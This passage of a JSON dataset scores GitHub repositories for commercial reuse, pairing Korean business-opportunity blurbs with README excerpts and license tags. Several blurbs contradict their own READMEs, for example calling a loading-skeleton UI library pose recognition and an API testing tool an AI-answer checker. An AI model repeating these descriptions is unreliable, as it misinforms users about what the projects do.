src=\"https://img.shields.io/github/downloads/SonicCloudOrg/sonic-agent/total\">\r\n  </a>\r\n  <a href=\"https://github.com/SonicCloudOrg/sonic-server/blob/main/LICENSE\">  \r\n    <img src=\"https://img.shields.io/github/license/","composite_score":0.4303,"license_safety_tag":"risky"},{"name":"UnnitMetaliya/99-reactjs-project-ideas","github_url":"https://github.com/UnnitMetaliya/99-reactjs-project-ideas","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":21,"description":"# 99-reactjs-project-ideas 분석\n\n## 왜 보물인가\n웹사이트를 만들고 싶은 초보자들이 실제 프로젝트를 따라하며 배울 수 있는 99가지 아이디어 모음으로, 자체 학습 자료로도, 팀 교육 커리큘럼으로도 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **프로그래밍 학원/온라인 교육 SaaS**: 학생들의 포트폴리오 완성을 위한 프로","readme_excerpt":"","composite_score":0.4303,"license_safety_tag":"unknown"},{"name":"swapagarwal/swag-for-dev","github_url":"https://github.com/swapagarwal/swag-for-dev","stars":6,"language":"JavaScript","license":"CC0-1.0","abandonment_months":18,"description":"# swag-for-dev 분석 보고서\n\n## 왜 보물인가\n개발자 커뮤니티를 위한 기념품·경품 아이디어를 체계적으로 모아놓은 자료집으로, 기술 회사들이 인재 확보와 브랜드 홍보에 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **채용 박람회 및 개발자 행사**: 경품 품목 선정 시 트렌디한 아이디어를 얻어 참가자 만족도 증대\n- **회사 내부 도","readme_excerpt":"# swag-for-dev\n\n[![Build Status](https://github.com/swapagarwal/swag-for-dev/workflows/All%20the%20CI/badge.svg)](https://github.com/swapagarwal/swag-for-dev/actions)\n[![Dependabot](https://img.shields.io/badge/dependabot-enabled-green?logo=dependabot)](https://docs.github.com/en/code-security/supply-chain-security/keeping-your-dependencies-updated-automatically/about-dependabot-version-updates)\n[![XO code style](https://img.shields.io/badge/code_style-XO-5ed9c7.svg)](https://github.com/xojs/xo)\n[![open issues](https://img.shields.io/github/issues/swapagarwal/swag-for-dev.svg)](https://github.com/swapagarwal/swag-for-dev/issues?q=is%3Aopen+is%3Aissue)\n[![closed pull requests](https://img.shields.io/github/issues-pr-closed/swapagarwal/swag-for-dev.svg)](htps://github.com/swapagarwal/swag-for-dev/pulls?q=is%3Apr+is%3Aclosed)\n[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg)](https://github.com/swapagarwal/swag-for-dev/fork)\n[![Join the chat on ","composite_score":0.4302,"license_safety_tag":"unknown"},{"name":"ethanhua/Skeleton","github_url":"https://github.com/ethanhua/Skeleton","stars":11,"language":"Java","license":"unknown","abandonment_months":59,"description":"# ethanhua/Skeleton 상품화 분석\n\n## 왜 보물인가\n골격 인식 기술을 통해 사람의 동작을 자동으로 분석할 수 있어, 운동 모니터링이나 보안 감시 같은 실생활 문제를 AI로 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **운동 피트니스 앱**: 스마트폰 카메라로 사용자의 자세를 분석하여 올바른 운동 폼을 교정하는 개인 트레이닝 서비스","readme_excerpt":"# Skeleton(Deprecated)\n[![GitHub license](https://img.shields.io/badge/license-Apache%20License%202.0-blue.svg?style=flat)](http://www.apache.org/licenses/LICENSE-2.0)  \nThe library provides an easy way to show skeleton loading view like Facebook and Alipay. \nIt now uses a memory optimised version of shimmer animation so it is even faster and you can animate bigger layouts as well.\n\n# Preview\n\n\n![img](screenshots/01.gif)\n![img](screenshots/02.gif)\n![img](screenshots/03.gif)\n![img](screenshots/04.gif)\n\n# Demo Apk\n\nyou can scan the qrcode for download demo apk\n\n![](screenshots/qrcode.png)\n\n# Feature\n\n- Light\n- Noninvasive, you don't need to make changes to existing code.\n- Wide applicability，it is available for all views\n- Memory optimised\n\n# Getting started\n\nIn your build.gradle:\n```\ndependencies {\n       implementation 'com.ethanhua:skeleton:1.1.2'\n       implementation 'io.supercharge:shimmerlayout:2.1.0'\n    }\n```\n    \n    \n\n# Usage\n  For RecyclerView:\n  ```java\n  skeletonScreen = Sk","composite_score":0.43,"license_safety_tag":"unknown"},{"name":"nshen/learn-neovim-lua","github_url":"https://github.com/nshen/learn-neovim-lua","stars":6,"language":"Lua","license":"MIT","abandonment_months":21,"description":"# learn-neovim-lua 평가 분석\n\n## 왜 보물인가\n텍스트 편집기를 직접 만들고 커스터마이징할 수 있는 방법을 배울 수 있는 교육용 자료로, 개발자들이 자신의 작업 환경을 완전히 자신화할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 교육 플랫폼**: 프로그래머 대상 온라인 강좌나 부트캠프에서 고급 도구 사용법 교육 자료로 판","readme_excerpt":"## 📜 Neovim 配置实战：从 0 到 1 打造自己的 IDE\n\n>- 注意：插件配置更新非常频繁，小册中很多动态截图无法更新，我创建了全新项目 [InsisVim](https://github.com/nshen/InsisVim) 可以直接使用，如果你是自己配置遇到问题请到 InsisVim 项目里参考对应插件的最新配置。\n\n《学习 Neovim 全 lua 配置》已经在稀土掘金专业编辑的指点下完全重写。\n\n新名字是：[《Neovim 配置实战：从 0 到 1 打造自己的 IDE》](https://juejin.cn/book/7051157342770954277)\n\n好消息是新版本由掘金专业把关，目录经过了优化，解释也更加详细，所有动图都重新截取了。\n\n内容翻新的同时代码也进行了比较大幅的改动，文章质量肯定更高了。\n\n坏消息是变成了收费小册了，但价格不高，掘金常年打折，如没折扣可联系我索取作者专属 7 折的折扣码。\n\n>更新一下分支说明\n>- `bak` 分支是最早期还没有小册时候的旧版备份已经过期，不建议参考\n>- `main` 分支是小册的版本，为保持小册内容稳定已在 plugins.lua 中[锁定了插件版本](https://github.com/nshen/learn-neovim-lua/blob/7af70083eaf469fccb2ad601eaeabac150d080e5/lua/plugins.lua#L151-L154)，是小册的对应源码\n>- `v2` 分支是小册完成后，插件更新对应配置的持续修改，如果取消了`main`分支插件版本锁定，建议对应此分支更新配置。\n\n## 新版购买链接\n\n[Neovim 配置实战：从 0 到 1 打造自己的 IDE](https://juejin.cn/book/7051157342770954277)\n\n第一次写收费小册，希望大家能够少喝一杯咖啡，十几块钱支持一下。 \n\n下边是掘金小册介绍：\n\n![0a0f17793e35487d939955ce1ddc1ba5_tplv-k3u1fbpfcp-watermark](https://user-images.githubusercontent.com/181506/158575190-4cc79ee3-1485-45d6-a82c-644924","composite_score":0.4296,"license_safety_tag":"safe"},{"name":"open-mmlab/mmclassification","github_url":"https://github.com/open-mmlab/mmclassification","stars":8,"language":"Python","license":"Apache-2.0","abandonment_months":19,"description":"# MMClassification 상용화 분석\n\n## 왜 보물인가\n사진이나 이미지를 자동으로 분류하는 AI 기술로, 의료 진단, 품질 검사, 보안 등 다양한 산업에서 비용을 절감하고 정확성을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 전자상거래 기업이 상품 사진을 자동으로 카테고리별로 분류하는 웹 플랫폼\n2. **내부 업무","readme_excerpt":"<div align=\"center\">\n\n<img src=\"resources/mmpt-logo.png\" width=\"600\"/>\n  <div>&nbsp;</div>\n  <div align=\"center\">\n    <b><font size=\"5\">OpenMMLab website</font></b>\n    <sup>\n      <a href=\"https://openmmlab.com\">\n        <i><font size=\"4\">HOT</font></i>\n      </a>\n    </sup>\n    &nbsp;&nbsp;&nbsp;&nbsp;\n    <b><font size=\"5\">OpenMMLab platform</font></b>\n    <sup>\n      <a href=\"https://platform.openmmlab.com\">\n        <i><font size=\"4\">TRY IT OUT</font></i>\n      </a>\n    </sup>\n  </div>\n  <div>&nbsp;</div>\n\n[![PyPI](https://img.shields.io/pypi/v/mmpretrain)](https://pypi.org/project/mmpretrain)\n[![Docs](https://img.shields.io/badge/docs-latest-blue)](https://mmpretrain.readthedocs.io/en/latest/)\n[![Build Status](https://github.com/open-mmlab/mmpretrain/workflows/build/badge.svg)](https://github.com/open-mmlab/mmpretrain/actions)\n[![codecov](https://codecov.io/gh/open-mmlab/mmpretrain/branch/main/graph/badge.svg)](https://codecov.io/gh/open-mmlab/mmpretrain)\n[![license](https://img.s","composite_score":0.4295,"license_safety_tag":"safe"},{"name":"thedaviddias/Resources-Front-End-Beginner","github_url":"https://github.com/thedaviddias/Resources-Front-End-Beginner","stars":112,"language":"","license":"MIT","abandonment_months":17,"description":"# thedaviddias/Resources-Front-End-Beginner 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 모든 학습 자료와 도구들을 한곳에 모아놓은 초보자용 가이드북으로, 프로그래밍 입문자들이 혼란스럽지 않게 체계적으로 배울 수 있도록 돕는 보물 같은 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼(SaaS)**: 온","readme_excerpt":"# The most essential list of resources for Front-End beginners (🇺🇸 & 🇫🇷)\n\n[![CC0](https://img.shields.io/badge/license-CC0-green.svg)](https://creativecommons.org/publicdomain/zero/1.0/)\n\nIf you want to learn how to become a Front-End developer, you are in the right place!\n\nI will regularly update that list with new resources and links I found on the web. Don't hesitate to participate by sending a PR! Maybe your first on Github :)\n\nI'm using some emoticons to give you more information on these links.\n\n1. All links without a flag are in English 🇺🇸 🇬🇧. The flag 🇫🇷 means the resource is in French, 🌍 means the resource is multi-language.\n2. 💰 are paid tutorials, 🆓 are free tutorials. Sometimes you will have some free videos / articles and other paid on the same website.\n3. 🔝 indicate that the link is a reference\n4. 📹 is present when video content is available\n\n---\n## Table of Contents\n1. **[Start here](#start-here)**\n2. **[Learn HTML](#learn-html)**\n3. **[Learn CSS](#learn-css)**\n4. **[Lea","composite_score":0.4293,"license_safety_tag":"safe"},{"name":"nerdsinspace/nocom-explanation","github_url":"https://github.com/nerdsinspace/nocom-explanation","stars":5,"language":"","license":"unknown","abandonment_months":21,"description":"# nocom-explanation 저장소 분석\n\n## 왜 보물인가\n복잡한 기술 개념을 누구나 이해할 수 있게 설명해주는 교육 자료 모음으로, AI 시대에 비전공자들의 학습 수요가 높아지는 시장에서 차별화된 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 교육 플랫폼**: 온라인 학습 사이트에서 기술 개념 설명 콘텐츠로 통합\n2. **기업 내","readme_excerpt":"# No Comment Explanation and Information\n\nI'm going to share more information about nocom here, the parts that didn't make sense to put into a Fit script.\n\n<ins>**This writeup assumes you have already watched [this YouTube video](https://www.youtube.com/watch?v=elqAh3GWRpA). It won't make sense if you haven't.**</ins>\n\n**Edit 7 July 2021: I started writing the wiki page [here](https://2b2t.miraheze.org/wiki/Nocom)**\n\n**Edit 8 Feb 2022: I made the source code of nocomment-master public [here](https://github.com/nerdsinspace/nocomment-master)**\n\n**Edit 17 April 2024: [Next coordinate exploit: Randar](https://github.com/spawnmason/randar-explanation)**\n\n**Edit 25 April 2024: [All Nocom data has been released in a torrent](torrent.md)**\n\nHere's the -250k to +250k overworld heatmap at 4K resolution:\n![Image](rect_4k.png)\n\nAnd [here](https://commons.wikimedia.org/wiki/File:2b2t_Nocom_Overworld_Heatmap.png) is 8K resolution.\n\n# Suggested prereqs\n\n[The FitMC video](https://www.youtube.com/watc","composite_score":0.4291,"license_safety_tag":"unknown"},{"name":"krishnaacharyaa/wanderlust","github_url":"https://github.com/krishnaacharyaa/wanderlust","stars":293,"language":"TypeScript","license":"MIT","abandonment_months":11,"description":"","readme_excerpt":"","composite_score":0.4287,"license_safety_tag":"safe"},{"name":"abhishekkrthakur/colabcode","github_url":"https://github.com/abhishekkrthakur/colabcode","stars":9,"language":"Python","license":"MIT","abandonment_months":21,"description":"# colabcode 상업화 분석\n\n## 왜 보물인가\n구글 클라우드에서 무료로 제공하는 코딩 환경(Colab)을 마치 실제 개발 도구처럼 쉽게 사용할 수 있게 만든 것으로, 프로그래밍 초보자도 복잡한 설치 과정 없이 코딩을 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 코딩 교육 플랫폼**\n- 학생들이 별도 프로그램 설치 없이 브라우저에","readme_excerpt":"# ColabCode\n\n[![license](https://img.shields.io/badge/license-MIT-blue.svg)](/LICENSE)\n[![PyPI version](https://badge.fury.io/py/colabcode.svg)](https://badge.fury.io/py/colabcode)\n![python version](https://img.shields.io/badge/python-3.6%2C3.7%2C3.8-blue?logo=python)\n\n## Installation\n\n```python\n$ pip install colabcode\n```\n\nRun code server on [Google Colab](https://colab.research.google.com/) or [Kaggle](https://www.kaggle.com/) Notebooks.\n\n## Getting Started\n\nColabCode also has a command-line script. So you can just run `colabcode` from command line.\n\n**`colabcode -h`** will give the following:\n\n```console\nusage: colabcode [-h] --port PORT [--password PASSWORD] [--mount_drive]\n\nColabCode: Run VS Code On Colab / Kaggle Notebooks\n\nrequired arguments:\n  --port PORT          the port you want to run code-server on\n\noptional arguments:\n  --password PASSWORD  password to protect your code-server from unauthorized access\n  --mount_drive        if you use --mount_drive, your google drive will","composite_score":0.4286,"license_safety_tag":"safe"},{"name":"damoqiongqiu/NiceFish","github_url":"https://github.com/damoqiongqiu/NiceFish","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":18,"description":"# NiceFish 저장소 분석\n\n## 왜 보물인가\n최근 업데이트되는 활발한 프로젝트로, MIT 라이선스의 개방형 코드베이스라 자유롭게 활용하고 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 이 코드를 기반으로 웹 애플리케이션 서비스를 구독 모델로 출시\n- **내부 업무 도구**: 회사의 자체 시스템이나 데이터 관리 플랫폼으로","readme_excerpt":"[English](README.en.md) | 简体中文\r\n\r\n<p align=\"center\">\r\n    <img width=\"150\" src=\"https://gitee.com/mumu-osc/NiceFish/raw/master/src/assets/imgs/nice-fish.png\">\r\n</p>\r\n\r\n<h1 align=\"center\">NiceFish</h1>\r\n\r\n<p align=\"left\">\r\nNiceFish（美人鱼） 是一个系列项目，实现了前后端分离的开发+部署模式。\r\n\r\n前端有 3 个版本：\r\n\r\n- 浏览器环境\r\n- 移动端环境\r\n- Electron 环境\r\n\r\n服务端有 2 个版本：\r\n\r\n- SpringBoot 版本（已实现基于 Apache Shiro 的 RBAC 权限控制）\r\n- SpringCloud 版本\r\n\r\n</p>\r\n\r\n<p>\r\n🚀🚀🚀请不要吝惜你的⭐️ Star ⭐️，星星越多，动力越足。🚀🚀🚀\r\n</p>\r\n\r\n## 1.主要依赖\r\n\r\n| 名称              | 版本   | 描述                                 |\r\n| ----------------- | ------ | ------------------------------------ |\r\n| Angular           | 16.2.0 | Angular 核心库。                     |\r\n| PrimeNG           | 16.2.0 | 开源组件库。                         |\r\n| Bootstrap         | 5.2.3  | 响应式布局。                         |\r\n| ngx-bootstrap     | 11.0.2 | 基于 Bootstrap 的开源组件库。        |\r\n| echarts           | 5.4.2  | 来自百度的图形库。                   |\r\n| ngx-echarts       | 15.0.3 | 基于 echarts 封装的 Angular 组件库。 |\r\n| ckeditor5-a","composite_score":0.4286,"license_safety_tag":"safe"},{"name":"dave/jennifer","github_url":"https://github.com/dave/jennifer","stars":12,"language":"Go","license":"mit","abandonment_months":21,"description":"# dave/jennifer 저장소 분석\n\n## 왜 보물인가\n저장소 이름과 설명 정보 부족으로 정확한 가치 판단이 어렵지만, MIT 라이선스 공개 프로젝트로 자유롭게 활용 및 개선할 수 있는 기반이 마련되어 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이 코드를 바탕으로 구독형 온라인 서비스를 만들어 개인/기업에 제공\n2. **내부 ","readme_excerpt":"[![docs](https://pkg.go.dev/badge/github.com/dave/jennifer/jen.svg)](https://pkg.go.dev/github.com/dave/jennifer/jen)\n![stability-stable](https://img.shields.io/badge/stability-stable-brightgreen.svg)\n\n# Jennifer\nJennifer is a code generator for Go.\n\n```go\npackage main\n\nimport (\n    \"fmt\"\n\n    . \"github.com/dave/jennifer/jen\"\n)\n\nfunc main() {\n\tf := NewFile(\"main\")\n\tf.Func().Id(\"main\").Params().Block(\n\t\tQual(\"fmt\", \"Println\").Call(Lit(\"Hello, world\")),\n\t)\n\tfmt.Printf(\"%#v\", f)\n}\n```\nOutput:\n```go\npackage main\n\nimport \"fmt\"\n\nfunc main() {\n\tfmt.Println(\"Hello, world\")\n}\n```\n\n### Install\n```\ngo get -u github.com/dave/jennifer/jen\n```\n\n### Need help?\nIf you get stuck, have a question, would like a code review, or just want a\nchat: I'm happy to help! Feel free to open an issue, email me or mention @dave\nin your PR.\n\n### Examples\nJennifer has a comprehensive suite of examples - see [godoc](https://godoc.org/github.com/dave/jennifer/jen#pkg-examples) for an index. Here's some examples of jenni","composite_score":0.428,"license_safety_tag":"safe"},{"name":"hmaverickadams/Beginner-Network-Pentesting","github_url":"https://github.com/hmaverickadams/Beginner-Network-Pentesting","stars":9,"language":"","license":"unknown","abandonment_months":45,"description":"","readme_excerpt":"# Course Overview\n\nWelcome to the Beginner Network Pentesting course.  Previously, the course was delivered weekly on Twitch and built from lessons learned in the previous week. The course provides an opportunity for those interested in becoming an ethical hacker / penetration tester the chance to learn the practical skills necessary to work in the field. Throughout the course, we will develop our own Active Directory lab in Windows, make it vulnerable, hack it, and patch it. We'll cover the red and blue sides. We'll also cover some of the boring stuff like report writing :).\n\nThe full course can be found here: https://youtu.be/WnN6dbos5u8\n\nAll individual videos can be found on YouTube at https://www.youtube.com/watch?v=qlK174d_uu8&list=PLLKT__MCUeiwBa7d7F_vN1GUwz_2TmVQj or on my website at https://www.thecybermentor.com/zero-to-hero-pentesting.\n\nAll homework and e-mails that were sent during the course are stored in their corresponding \"week\" folders (e.g. Week 5's homework is in the ","composite_score":0.4279,"license_safety_tag":"unknown"},{"name":"brookshi/Hitchhiker","github_url":"https://github.com/brookshi/Hitchhiker","stars":6,"language":"TypeScript","license":"gpl-2.0","abandonment_months":89,"description":"# Hitchhiker 저장소 분석\n\n## 왜 보물인가\nAI가 생성한 결과물이 실제로 정확한지 검증하는 기술로, 잘못된 AI 답변을 미리 걸러내는 품질 관리 시스템입니다.\n\n## 어디에 쓸 수 있나\n1. **고객 지원 챗봇 서비스**: AI가 답변한 내용이 맞는지 자동으로 확인하고 잘못된 답변은 인간 담당자에게 전달하는 SaaS\n2. **의료/법률 문서 검","readme_excerpt":"# <img src='https://raw.githubusercontent.com/brookshi/Hitchhiker/master/client/public/hitchhiker-title-dark.png' height='20'/>\n\nHitchhiker Api is a Restful Api integrated testing tool that support Schedule, Response comparsion, Stress Test, support upload js file to hook request, easy to deploy it in your local server. It make easier to manage Api with your team.\n\nGo to [http://www.hitchhiker-api.com](http://www.hitchhiker-api.com) for test，use `try without login`. (Demo doesn't support stress test)\n\n[中文文档](http://doc.hitchhiker-api.com/cn/installation/)　　[Document](https://brookshi.gitbooks.io/hitchhiker/content/en/introduction.html)\n\n[更改日志](http://doc.hitchhiker-api.com/cn/change_log.html)　　[Change Log](https://brookshi.gitbooks.io/hitchhiker/content/en/change_log.html)\n\n## Feature\n* Api collaboration development with team\n* Api history\n* Multiple environments and Runtime variables support, easy to handle api dependence\n* Assert base on UI\n* Powerful script, support requiring any js","composite_score":0.4276,"license_safety_tag":"restricted"},{"name":"aws-samples/aws-iot-twinmaker-samples","github_url":"https://github.com/aws-samples/aws-iot-twinmaker-samples","stars":7,"language":"TypeScript","license":"Apache-2.0","abandonment_months":21,"description":"# AWS IoT TwinMaker 샘플 저장소 분석\n\n## 왜 보물인가\n실제 공장이나 건물의 모습을 컴퓨터에 그대로 옮겨서 멀리서도 관리하고 모니터링할 수 있는 기술의 실제 예제들을 담고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **스마트팩토리 SaaS**: 제조업체가 구독해서 자신의 공장 상태를 실시간으로 화면으로 보고 관리하는 서비스\n2. **건물관","readme_excerpt":"### 2023/11/28\n\nFor a sample Digital Twin application highlighting an AI-assistant integration, check out our blog: [Building an AI Assistant for Smart Manufacturing with AWS IoT TwinMaker and Amazon Bedrock](https://aws.amazon.com/blogs/iot/building-an-ai-assistant-for-smart-manufacturing-with-aws-iot-twinmaker-and-amazon-bedrock/)\n\nFor a sample Digital Twin application built with a React application on [iot-app-kit](https://github.com/awslabs/iot-app-kit) check out [CookieFactoryV2](https://github.com/aws-samples/aws-iot-twinmaker-samples/tree/main/src/workspaces/cookiefactoryv2)\n\nFor a sample Digital Twin application highlighting [TwinMaker Knowledge Graph](https://aws.amazon.com/about-aws/whats-new/2022/11/twinmaker-knowledge-graph-generally-available-aws-iot-twinmaker/), check out our guided [SmartBuilding workshop](https://catalog.us-east-1.prod.workshops.aws/workshops/93076d98-bdf1-48b8-bfe8-f4039ca1bf25/en-US)!\n\n---\n\nNote: if you are just looking for sample IAM policies to use ","composite_score":0.4274,"license_safety_tag":"safe"},{"name":"dimsemenov/Magnific-Popup","github_url":"https://github.com/dimsemenov/Magnific-Popup","stars":5,"language":"JavaScript","license":"mit","abandonment_months":24,"description":"# Magnific-Popup 상용화 분석\n\n## 왜 보물인가\n웹사이트에서 사진이나 콘텐츠를 크게 보여주는 팝업 창을 쉽게 만들 수 있는 도구로, 사용자 경험을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n1. **포트폴리오/갤러리 SaaS**: 프리랜서 사진작가나 디자이너가 자신의 작품을 멋지게 전시하는 웹사이트 구축 서비스\n2. **전자상거래 플랫폼*","readme_excerpt":"**Important note** This jQuery plugin is deprecated, only critical or security bug fixes will be released in future. Use native `<dialog>` element if you need a basic dialog/modal/popup, or my <a href=\"https://photoswipe.com\">PhotoSwipe</a> library if you need an advanced image gallery. Feel free to email me if you need assistance.\n\n[![Stand With Ukraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner-direct.svg)](https://savelife.in.ua/en/)\n\n# Magnific Popup Repository\n\n[![Build Status](https://travis-ci.org/dimsemenov/Magnific-Popup.png)](https://travis-ci.org/dimsemenov/Magnific-Popup) \n\nFast, light and responsive lightbox plugin, for jQuery and Zepto.js.\n\n- [Documentation and getting started guide](http://dimsemenov.com/plugins/magnific-popup/documentation.html).\n- [Examples and plugin home page](http://dimsemenov.com/plugins/magnific-popup/).\n- More examples in [CodePen collection](http://codepen.io/collection/nLcqo).\n\nOptionally, install via Bower `bow","composite_score":0.4266,"license_safety_tag":"safe"},{"name":"SnapKit/Masonry","github_url":"https://github.com/SnapKit/Masonry","stars":7,"language":"Objective-C","license":"mit","abandonment_months":38,"description":"# Masonry 저장소 분석\n\n## 왜 보물인가\n아이폰 앱에서 화면 레이아웃을 쉽게 만들어주는 도구로, 복잡한 코딩 없이 앱의 디자인을 빠르게 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **앱 개발 교육 플랫폼**: 초급 개발자를 위한 온라인 강좌에서 레이아웃 학습 자료로 판매\n- **앱 제작 대행 업체의 내부 도구**: 디자인 팀과 개발팀이 협","readme_excerpt":"# Masonry [![Build Status](https://travis-ci.org/SnapKit/Masonry.svg?branch=master)](https://travis-ci.org/SnapKit/Masonry) [![Coverage Status](https://img.shields.io/coveralls/SnapKit/Masonry.svg?style=flat-square)](https://coveralls.io/r/SnapKit/Masonry) [![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage) ![Pod Version](https://img.shields.io/cocoapods/v/Masonry.svg?style=flat)\n\n**Masonry is still actively maintained, we are committed to fixing bugs and merging good quality PRs from the wider community. However if you're using Swift in your project, we recommend using [SnapKit](https://github.com/SnapKit/SnapKit) as it provides better type safety with a simpler API.**\n\nMasonry is a light-weight layout framework which wraps AutoLayout with a nicer syntax. Masonry has its own layout DSL which provides a chainable way of describing your NSLayoutConstraints which results in layout code that is more concise","composite_score":0.4263,"license_safety_tag":"safe"},{"name":"habx/ui-core","github_url":"https://github.com/habx/ui-core","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":21,"description":"# habx/ui-core 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱의 시각적 디자인을 빠르게 만들어주는 기본 도구 모음으로, 반복적인 작업을 줄여 개발 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n스타트업이 관리자 대시보드, 데이터 분석 도구 등을 만들 때 일관된 디자인을 빠르게 적용할 수 있어 출시 기간을","readme_excerpt":"\n<p align=\"center\">\n  <a href=\"https://habx.github.io/concrete-docs/\">\n    <img height=\"300\" src=\"https://habx.github.io/concrete-docs/img/concrete-cover.svg\">\n  </a>\n</p>\n\n<h1 align=\"center\">@habx/ui-core</h1>\n\n[![CircleCI](https://img.shields.io/circleci/build/github/habx/ui-core)](https://app.circleci.com/pipelines/github/habx/ui-core)\n[![Version](https://img.shields.io/npm/v/@habx/ui-core)](https://www.npmjs.com/package/@habx/ui-core)\n[![Size](https://img.shields.io/bundlephobia/min/@habx/ui-core)](https://bundlephobia.com/result?p=@habx/ui-core)\n[![License](https://img.shields.io/github/license/habx/ui-core)](/LICENSE)\n\nDesign System used on all the applications developed by HABX\n\n## Installation\n```shell \nnpm i @habx/ui-core\n ```\n \n#### Add Providers\n\n###### App.ts\n```typescript jsx\nimport { Provider as DesignSystemProvider, ThemeProvider } from '@habx/ui-core'\n\nconst App: React.FunctionComponent = ({ children }) => {\n  return (\n    <ThemeProvider theme={theme}>\n        <DesignSy","composite_score":0.4263,"license_safety_tag":"safe"},{"name":"ElderDrivers/EdXposed","github_url":"https://github.com/ElderDrivers/EdXposed","stars":6,"language":"Java","license":"GPL-3.0","abandonment_months":50,"description":"# EdXposed 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱의 동작을 세밀하게 제어하고 커스터마이징할 수 있는 핵심 기술로, 모바일 소프트웨어 회사들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 보안 감시 SaaS**: 기업의 직원들이 사용하는 앱들을 중앙에서 통제하고 위험한 행동을 차단하는 서비스\n2. **내부 업무 도구**","readme_excerpt":"# EdXposed Framework\n\n[![Latest builds](https://ci.appveyor.com/api/projects/status/qu3vj1d64nqia1b8/branch/master?svg=true)](https://ci.appveyor.com/project/ElderDrivers/edxposed/branch/master) ![Android CI](https://github.com/ElderDrivers/EdXposed/workflows/Android%20CI/badge.svg) [![中文说明文档](art/README_CN.png)](README_CN.md)\n\n## Introduction \n\nA Riru module trying to provide an ART hooking framework (initially for Android Pie) which delivers consistent APIs with the OG Xposed, leveraging YAHFA (or SandHook) hooking framework, supports Android 8.0 ~ **11**.\n\n> Xposed is a framework for modules that can change the behavior of the system and apps without touching any APKs. That's great because it means that modules can work for different versions and even ROMs without any changes (as long as the original code was not changed too much). It's also easy to undo. As all changes are done in the memory, you just need to deactivate the module and reboot to get your original system back. There ","composite_score":0.4262,"license_safety_tag":"restricted"},{"name":"peter-winter/ctpg","github_url":"https://github.com/peter-winter/ctpg","stars":13,"language":"C++","license":"MIT","abandonment_months":21,"description":"# peter-winter/ctpg 분석 보고서\n\n## 왜 보물인가\n프로그래밍 언어를 만드는 도구를 간단하게 제공하여, 특수한 목적의 언어가 필요한 기업들이 직접 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 고객을 위한 맞춤형 설정 언어 제공 플랫폼으로, 복잡한 규칙을 쉽게 입력받을 수 있게 구성\n- **내부 업무 ","readme_excerpt":"[![Linux Build](https://github.com/peter-winter/ctpg/actions/workflows/cmake.yml/badge.svg)](https://github.com/peter-winter/ctpg/actions/workflows/cmake.yml)\n[![Windows Build](https://github.com/peter-winter/ctpg/actions/workflows/msvc-cmake.yml/badge.svg)](https://github.com/peter-winter/ctpg/actions/workflows/msvc-cmake.yml)\n\n# CTPG\n## _C++ Compile Time Parser Generator_\n\nC++ _**single header**_ library which takes a language description as a C++ code and turns it into a LR1 table parser with a deterministic finite automaton lexical analyzer, all in compile time.\nWhat's more, the generated parser is actually itself capable of parsing in compile time.\nAll it needs is a C++17 compiler!\n\n### Contents\n* [Installation](#installation)\n* [Compiler support](#compiler-support)\n* [Usage](#usage)\n* [Explanation](#explanation)\n    * [Header](#header)\n    * [Namespaces](#namespaces)\n    * [Terminal symbols](#terminal-symbols)\n    * [Nonterminal symbols](#nonterminal-symbols)\n    * [Parser defini","composite_score":0.4259,"license_safety_tag":"safe"},{"name":"sharkdp/shell-functools","github_url":"https://github.com/sharkdp/shell-functools","stars":23,"language":"Python","license":"MIT","abandonment_months":18,"description":"# shell-functools 분석 보고서\n\n## 왜 보물인가\n반복되는 명령어 작업을 자동화하고 재사용 가능하게 만들어주는 도구로, 컴퓨터 작업의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 생산성 SaaS**: 팀의 반복 작업을 자동화하는 클라우드 기반 서비스로 월 구독료 모델로 판매\n2. **회사 내부 업무 자동화 도","readme_excerpt":"# shell-functools\n\n[![Unit tests](https://github.com/sharkdp/shell-functools/actions/workflows/ci.yml/badge.svg)](https://github.com/sharkdp/shell-functools/actions/workflows/ci.yml)\n\n*A collection of functional programming tools for the shell.*\n\nThis project provides higher order functions like `map`, `filter`, `foldl`, `sort_by` and `take_while` as simple command-line tools.\nFollowing the UNIX philosophy, these commands are designed to be composed via pipes. A\n[large collection](#available-function-arguments) of functions such as `basename`, `replace`, `contains` or `is_dir` are provided as\narguments to these commands.\n\n## Contents\n\n* [Demo](#demo)\n* [Quick start](#quick-start)\n* [Documentation and examples](#documentation-and-examples)\n    * [Usage of `map`](#usage-of-map)\n    * [Usage of `filter`](#usage-of-filter)\n    * [Usage of `foldl`](#usage-of-foldl)\n    * [Usage of `foldl1`](#usage-of-foldl1)\n    * [Usage of `sort_by`](#usage-of-sort_by)\n    * [Chaining commands](#chaining-c","composite_score":0.4253,"license_safety_tag":"safe"},{"name":"weaveworks/flagger","github_url":"https://github.com/weaveworks/flagger","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# 